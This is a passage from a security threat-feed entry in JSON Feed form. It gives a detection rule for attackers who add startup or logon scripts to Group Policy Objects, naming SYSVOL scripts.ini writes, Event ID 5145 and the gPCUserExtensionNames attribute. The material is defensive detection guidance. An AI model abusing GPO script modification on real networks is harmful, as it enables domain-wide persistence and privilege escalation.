\u003ccode\u003egPCUserExtensionNames\u003c/code\u003e, and for Event ID 5145 on the \u003ccode\u003eSYSVOL\u003c/code\u003e share where the relative target name ends in \u003ccode\u003escripts.ini\u003c/code\u003e or \u003ccode\u003epsscripts.ini\u003c/code\u003e and the access list includes WriteData (\u003ccode\u003e%%4417\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eRegularly review GPO script settings, including the contents of the referenced script files, to identify any unauthorized or suspicious scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-gpo-ini-script-modification/","summary":"This rule detects the modification of Group Policy Objects (GPO) to add a startup or logon script to user or computer objects, enabling attackers to achieve privilege escalation and persistence by executing arbitrary commands at scale.","title":"CraftedSignal 
Threat Feed — Group-Policy","version":"https://jsonfeed.org/version/1.1"}